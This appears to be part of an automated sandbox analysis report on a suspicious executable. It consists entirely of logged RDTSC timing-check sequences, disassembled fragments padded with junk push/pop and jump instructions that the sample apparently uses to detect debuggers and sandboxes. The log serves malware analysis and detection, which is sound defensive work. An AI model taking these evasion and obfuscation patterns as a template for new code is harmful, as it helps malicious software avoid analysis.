                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D4E second address: 7C6D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D52 second address: 7C6D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6DEE second address: 7C6E12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e ja 00007F5ED52EEF76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6E12 second address: 7C6E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6E17 second address: 7C6E42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5ED52EEF82h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f jc 00007F5ED52EEF78h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6E42 second address: 7C6E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C774E second address: 7C7761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jns 00007F5ED52EEF76h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7808 second address: 7C781D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C781D second address: 7C786F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F5ED52EEF78h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 lea eax, dword ptr [ebp+1248825Bh] 0x00000027 jnc 00007F5ED52EEF7Ch 0x0000002d jmp 00007F5ED52EEF7Eh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jo 00007F5ED52EEF78h 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A552D second address: 7A5569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5ED4EAF494h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F5ED4EAF47Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F536D second address: 7F5372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5372 second address: 7F537A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F537A second address: 7F537E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F537E second address: 7F5382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5382 second address: 7F5396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5ED52EEF78h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5396 second address: 7F53B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF486h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F53B2 second address: 7F53B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5695 second address: 7F56DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF47Eh 0x00000009 pushad 0x0000000a jmp 00007F5ED4EAF480h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 jl 00007F5ED4EAF476h 0x00000019 popad 0x0000001a jmp 00007F5ED4EAF483h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F56DE second address: 7F5700 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5ED52EEF89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5B4A second address: 7F5B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5B4E second address: 7F5B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5ED52EEF86h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786DD4 second address: 786DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD6BC second address: 7FD6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD6C7 second address: 7FD6D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5ED4EAF47Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD6D9 second address: 7FD6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDE12 second address: 7FDE32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDE32 second address: 7FDE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5ED52EEF76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE0D9 second address: 7FE0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE0DF second address: 7FE0F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F5ED52EEF76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE381 second address: 7FE3C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F5ED4EAF476h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F5ED4EAF486h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5ED4EAF47Bh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB17 second address: 7FEB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5ED52EEF76h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB25 second address: 7FEB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB2B second address: 7FEB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD3D6 second address: 7FD3DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD3DA second address: 7FD40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5ED52EEF7Dh 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jmp 00007F5ED52EEF89h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD40F second address: 7FD419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD419 second address: 7FD438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5ED52EEF80h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD438 second address: 7FD43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801C44 second address: 801C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7836A7 second address: 7836C3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5ED4EAF476h 0x00000008 jmp 00007F5ED4EAF482h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7836C3 second address: 7836E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF87h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F5ED52EEF76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807673 second address: 8076A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5ED4EAF482h 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F5ED4EAF47Fh 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8076A6 second address: 8076AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80645D second address: 806461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806461 second address: 806480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5ED52EEF89h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8065E2 second address: 8065E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8065E6 second address: 8065EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80677A second address: 806784 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5ED4EAF482h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806A9A second address: 806AAD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5ED52EEF7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806AAD second address: 806AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806AC4 second address: 806AD0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A6DB second address: 80A6E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CB54 second address: 80CB70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810B9E second address: 810BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F5ED4EAF476h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810BB0 second address: 810BD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5ED52EEF97h 0x0000000e jmp 00007F5ED52EEF7Fh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810BD0 second address: 810BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8102D1 second address: 8102F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF89h 0x00000007 pushad 0x00000008 ja 00007F5ED52EEF76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8102F5 second address: 8102FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810887 second address: 8108AC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5ED52EEF8Fh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F5ED52EEF87h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8108AC second address: 8108B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814D2A second address: 814D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jmp 00007F5ED52EEF85h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81403F second address: 814056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF47Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814056 second address: 81405C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81419D second address: 8141B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5ED4EAF476h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F5ED4EAF476h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141B2 second address: 8141B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8141B6 second address: 8141BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814477 second address: 814485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F5ED52EEF7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814640 second address: 81464C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5ED4EAF476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81464C second address: 814651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780102 second address: 780106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A1EE second address: 81A1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A1F2 second address: 81A1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A1F8 second address: 81A21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F5ED52EEF76h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F5ED52EEF86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A21D second address: 81A223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823398 second address: 82339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82339C second address: 8233A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233A0 second address: 8233B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jl 00007F5ED52EEF76h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233B5 second address: 8233B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233B9 second address: 8233C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233C1 second address: 8233D5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5ED4EAF47Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8233D5 second address: 8233D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82168F second address: 8216AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5ED4EAF476h 0x0000000a jg 00007F5ED4EAF476h 0x00000010 popad 0x00000011 jnp 00007F5ED4EAF484h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8219CC second address: 821A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b jc 00007F5ED52EEF92h 0x00000011 jmp 00007F5ED52EEF86h 0x00000016 jp 00007F5ED52EEF76h 0x0000001c pop eax 0x0000001d push edi 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821A00 second address: 821A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821A0A second address: 821A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821C74 second address: 821C90 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5ED4EAF47Eh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822545 second address: 82255D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822DE5 second address: 822E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF485h 0x00000007 jno 00007F5ED4EAF476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F5ED4EAF476h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230AC second address: 8230B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230B2 second address: 8230D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5ED4EAF476h 0x0000000d jmp 00007F5ED4EAF489h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230D8 second address: 8230E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8230E0 second address: 823102 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF48Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823102 second address: 823108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 823108 second address: 82310C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
